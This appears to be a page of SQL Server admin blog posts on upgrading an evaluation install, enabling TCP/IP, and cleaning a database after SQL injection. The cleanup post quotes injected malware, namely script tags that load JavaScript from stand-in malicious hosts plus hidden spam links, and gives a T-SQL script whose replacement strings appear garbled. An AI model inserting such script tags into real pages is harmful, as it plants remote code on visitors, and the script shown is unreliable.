Upgrading SQL Server 2008 R2 from Evaluation to Licensed

As a Microsoft partner, we have access to software resources to help us do our jobs while getting ourselves familiar with the MS family of products.

We had an in-house project that needed SQL Server, so we installed SQL Server 2008 R2 Enterprise in Evaluation mode, since we didn’t have the product key handy.

Install went fine, server works great, everyone is happy.

170 or so days go by and we run an SSIS package and notice the warning “Evaluation Version, will expire in 8 days”  Wha?  Do a quick Select @@Version and sure enough, we’re still running the evaluation version… in a production environment.  (Facepalm!)

Searching around for how to turn my eval version into a licensed version (we finally got around to requesting the key from MS) showed all sorts of solutions, none of them seemed to really fit the bill.

Some people admonished “You’re using Eval software in a  production environment!?? Serves you right!  Uninstall/reinstall!” others required odd registry hacks to make the setup program run — it all seemed so complex for what should be a pretty simple process.

Lo and behold, buried at the very end of the comments attached to one of these complex blog posts, was the simplest of solutions from a chap named Waleed Al-Qudah:

“Go to Microsoft SQL Server Configuration Tools, and navigate to SQL Server installation Center then click the Maintinance link and choose Edition Upgrade.”

Two minutes later, we were all legal.

The SQL Server Installation Center is a fairly complicated looking piece of software, and I never noticed that tab nor that option.  Needless to say, I spent a few more minutes looking through it. 🙂

Connecting to SQL Server 2008 via TCP/IP on Windows 2008

Recently installed SQL Server 2008 on a Windows 2008 box and was happily adminsitering it from the console of the local server.  When I fired up SSMS (SQL Server Management Studio) from my development machine, it wouldn’t connect.

I turned the firewall off  and still couldn’t connect.

Turns out TCP/IP isn’t turned on by default.  Maybe I knew that at one time, but this time it totally slipped  my mind.

To turn it on, go into SQL Server Configuration Manager, expand “SQL Server Network Configuration” and change “Disabled” to “Enabled” by right-clicking on “TCP/IP” and suddenly, I could connect from my development machine.

Cleaning Up After a SQL Injection Attack, Part 2

Got a call today off our previous article in this series from Branden of Hot Media Group, Inc., aChicago-based web application development, networking, and graphic design firm who found himself with a database full of malware infections, but the characteristics of his attack didn’t match what we had written about, so he called us up. We reviewed his symptoms and were able to tweak the code we provided previously to work with this new set of issues.

We weren’t able to see how the site was attacked, nor did we worry about how the site would be steeled against future occurrence (always use stored procedures and/or parametrized queries, kids!) — this was purely a cleanup job.

This is the code we had:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
PRINT ('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'],'''', '''')') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND b.xtype=99 OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN PRINT ('UPDATE ['+@T+'] SET ['+@C+']=cast(replace(cast(['+@C+'] as nvarchar(4000)),'''','''') as ntext)')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

And that worked fine, but it had some shortcomings — mostly it only stripped out a single bit of invasive code, and our new friend had quite a bit of code to deal with, so instead of the almost quaint looking malware code:

<script src="hxxp://evilsite.evl/b.js"></script>

We had this jumble of code in every ntext field in his database:

<script type='text/javascript' src='http://google-anallytics.bad/urchin.js'></script>
<div style='display:none;'><a href='http://tests4all.bad/1/'>journals on losing post-pregnancy weight</a>
<a href='http://tests4all.bad/2/'>personal trainer certification atlanta</a>
<a href='http://tests4all.bad/3/'>quit smoking water vapor rings</a>
<a href='http://tests4all.bad/4/'>eyes in the darkness</a>
<a href='http://tests4all.bad/5/'>cheated map on dota 6.54b</a>
<a href='http://tests4all.bad/6/'>occupations for bored teen boys</a>
<a href='http://tests4all.bad/7/'>cgw southeast partners ilp</a>
<a href='http://tests4all.bad/8/'>does iq tests accurately measure intelligence</a>
<a href='http://tests4all.bad/9/'>free total psychic reading</a>
<a href='http://tests4all.bad/10/'>minnesota past life regression</a>
<a href='http://tests4all.bad/11/'>date of abraham lincolns death</a>

After trying to figure out the best way to escape all the single quotes, Branden — an accomplished ColdFusion developer — suggests “why don’t we just drop everything to the right of the <script> tag?”
Continue reading Cleaning Up After a SQL Injection Attack, Part 2

How To Clean Up After a SQL Injection Attack

NEW AND IMPROVED UPDATE: Cleaning Up After a SQL Injection Attack, Part 2

[UPDATE: Added code to deal with replacing text in the ntext fields of SQL Server 2000.]

One of our clients got hit with a web attack a week or so ago. We’re still not quite sure how this particular attack was carried out — we’re thinking an unpatched web server at the hosting facility — but it did cause me to look at the log file of the web site to see who might have been able to overwrite index.htm in the root directory. (The FTP logs held the clue — a rogue in Asia who cracked the password.)

As I said, it turned up nothing, but I did see a series of SQL Injection attacks — none of which were successful (always check your variables, kids!) — but they piqued my interest, so I took it apart. Continue reading How To Clean Up After a SQL Injection Attack